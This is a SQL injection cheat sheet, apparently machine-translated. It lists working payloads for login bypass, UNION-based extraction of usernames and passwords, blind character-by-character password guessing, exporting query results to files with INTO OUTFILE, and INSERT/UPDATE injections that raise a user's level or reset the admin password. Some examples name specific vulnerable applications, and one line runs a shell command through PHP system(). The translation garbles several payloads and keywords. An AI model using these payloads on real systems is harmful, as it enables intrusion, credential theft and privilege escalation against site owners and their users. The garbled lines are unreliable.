'OR 1 = 1
'or' 1 = 1
'/ *
'%twenty three
'and password =' mypass
ID = -1 Union SELECT 1,1,1
ID = -1 Union Select Char (97), Char (97), CHAR (97)
ID = 1 Union SELECT 1,1,1 from membrate
ID = 1 Union SELECT 1,1,1 from admin
ID = 1 Union SELECT 1,1,1 from user
Userid = 1 and password = mypass
Userid = 1 and MID (Password, 3, 1) = char (112)
Userid = 1 and MID (Password, 4, 1) = char (97)
AND ORD (MID (Password, 3, 1))> 111 (the ORD function is very easy to use, you can return shaping)
'and length (password) =' 6 (detection password length)
'and left (Password, 1) =' m
'and left (password, 2) =' my
…………………………And so on
'Union Select 1, UserName, Password from user / *
'Union Select 1, UserName, Password from user / *
= 'Union Select 1, username, password from user / * (can be 1 or = directly followed)
99999 Union SELECT 1, Username, Password from user / *
'Into Outfile' C: /File.txt (Export File)
= 'or 1 = 1 INTO OUTFILE' C: /FILE.TXT
1 'Union Select 1, UserName, Password from User Into Outfile' C: /user.txt
SELECT Password from admins where login = 'john' into dumpfile '/path/to/site/file.txt'
ID = 'Union Select 1, Username, Password from User Into Outfile
ID = -1 Union Select 1, Database (), Version () (flexible application query)
Common query test statement,
SELECT * from Table Where 1 = 1
Select * from table where 'uuu' = 'uuu'
Select * from Table Where 1 <> 2
Select * from Table Where 3> 2
Select * from table where 2 <3
Select * from Table Where 1
SELECT * home where WHERE 1 1
Select * from table where 1--1
Select * from table where isnull (NULL)
Select * from Table Where Isnull (Cot (0))
Select * from table where 1 is not null
Select * from Table Where Null Is NULL
Select * from Table Where 2 Between 1 and 3
Select * from table where 'b' Between 'A' and 'c'
Select * from Table where 2 in (0, 1, 2)
Select * from Table Where Case When 1> 0 THEN 1 END
For example: Night Cat Download System 1.0 Version
ID = 1 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1
Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_user
Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1
ID = 10000 Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from YMDOWN_USER WHERE ID = 1 And GroupID = 1
Union SELECT 1, Username, 1, Password, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 (replace, looking for password )
Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD (MID Password, 1, 1)) = 49 (verify the first password)
Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD (MID Password, 2, 1)) = 50 (second)
Union SELECT 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from Ymdown_User WHERE ID = 1 AND ORD (MID Password, 3,1)) = 51
..............................................................
For example 2: Gray Track Transform ID Test (Meteor)
Union% 20 (select% 20allowsmilies, public, userid, '0000-0-0 ", user (), version ()% 20FROM% 20calendar_events% 20where% 20eventid% 20 =% 2013)% 20EVENTDATE
Union% 20 (select% 20 allowsmilies, public, userid, '0000-0-0 ", pass (), version ()% 20FROM% 20Calendar_events% 20where% 20Eventid% 20 =% 2010)% 20EVENTDATE
Construct statement:
Select Allowsmilies, Public, Userid, Eventdate, Event, Subject from Calendar_Events Where EventId = 1 Union (SELECT 1, 1, 1, 1, 1, 1 from user where userid = 1)
Select Allowsmilies, Public, Userid, Eventdate, Event, Subject from Calendar_Events Where EventId = 1 Union (SELECT 1, 1, 1, 1, UserId = 1) Union% 20 (SELECT% 201, 0, 2 , '1999-01-01', 'A', Password% 20FROM% 20User% 20where% 20Userid% 20 =% 205)% 20ORDER% 20BY% 20eventDate
Union% 20 (SELECT% 201, 0, 12695, '1999-01-01', 'A', Password% 20FROM% 20User% 20where% 20Userid = 13465)% 20ORDER% 20BY% 20eventDate
Union% 20 (select% 201, 0, 12695, '1999-01-01', 'a', userid% 20FROM% 20User% 20where% 20Username = 'Sandflee')% 20RDER% 20BY% 20EventDate (ID)
(Select a from table_name where a = 10 and b = 1 ORDER BY a LIMIT 10)
SELECT * from ARTICLE WHERE ARTICLEID = '$ ID' Union Select * from ... (in the same case of fields and databases, you can directly submit)
Select * from article where articleid = '$ ID' Union SELECT 1, 1, 1, 1, 1, 1, 1 from ... (in different cases)
Special skills: Write in the form, search engine and other places:
"___"
".__"
"%
% 'Order by ArticleID / *
% 'Order by ArticleID #
__ 'Order by ArticleID / *
__ 'Order by ArticleID #
$ comMMAND = "DIR C: /"; System ($ Command);
Select * from article where articleid = '$ ID'
Select * from article where articleid = $ ID
1 'and 1 = 2 Union Select * from user where userid = 1 / * sentences to
(Select * from article where articleid = '1' and 1 = 2 union select * from user where userid = 1 / * ')
1 and 1 = 2 Union Select * from user where userid = 1
Statement form: establish a library, insert:
Create Database` Injection`
Create Table `User` (
`Userid` int (11) Not null auto_increment,
`Username` VARCHAR (20) Not null default ',
`Password` VARCHAR (20) Not null default ', primary key (` Userid`)
);
INSERT INTO `USER` VALUES (1, 'swap', 'mypass");
Insert, like a registered user:
INSERT INTO `USER` (UserID, Username, Password, HomePage, Userlevel) Values ('', '$ usrname",' $ password ',' $ homepage ',' 1 ');
"INSERT INTO MEMBRES (Login, Password, Nom, Email, Userlevel) Values ('$ login', '$ Pass', '$ NOM', '$ Email', '1')
INSERT INTO MEMBRES (Login, Password, NOM, Email, Userlevel) Values ('', ',' ',' ',' 3 ') #', '1')
"INSERT INTO MEMBRES SET login = '$ login', password = '$ pass', NOM = '$ NOM', Email = '$ Email'
INSERT INTO MEMBRES set login = ', password =', NOM = ', userlevel =' 3 ', email =' '
"INSERT INTO MEMBRES VALUES ('$ ID', '$ login', '$ Pass', '$ NOM', '$ Email', '1')
Update user set password = '$ password', homepage = '$ homepage' where id = '$ ID'
Update user set password = 'md5 (mypass)' where username = 'admin' #) ', homepage =' $ homepage 'where id =' $ ID '
"Update MEMBRES SET Password = '$ Pass', NOM = '$ NOM', Email = '$ Email' Where ID = '$ Id'";
Update membres set password = '[pass]', NOM = ', userlevel =' 3 ', email =' 'where id =' [id] '
"Update news set votes = votes 1, score = score $ note where idnews = '$ ID'"
Long usage function:
Database ()
User () system_user ()
Session_user ()
Current_user ()
such as:
Update Article Set Title = $ TITLE WHERE ARTICLEID = 1 Correspondence
Update Article Set Title = Database () Where id = 1
# Update the current database name to the Title field
Update article set title = user () where id = 1
# Update the current MySQL username to the title field
Update article set title = system_user () where id = 1
# Update the current MySQL username to the title field
Update article set title = session_user () where id = 1
# Update the current MySQL username to the title field
Update Article Set Title = current_user () Where id = 1
# Update the current session authenticated username to the title field
::::: :::::::::::::::::::::: ::::::::::::::
$ REQ = "SELECT * from MEMBRES where name like '% $ search%' Order by name";
Select * from membrate where name like '%%' Order by uid #% 'Order by Name
Select * from membrate where name like '%%' Order by uid #% 'Order by Name
SELECT Uid from admins where login = '' or 'a' = 'a' and password = '' or 'a' = 'a' (classic)
SELECT Uid from admin s where login = '' or admin_level = 1 # 'and password =' '
Select * from table where msg like '% hop'
SELECT Uid from membrate where login = 'bob' and password Like 'a%' # 'and password =' select * from membrate where name limited '%%' Order by uid #% 'Order by Name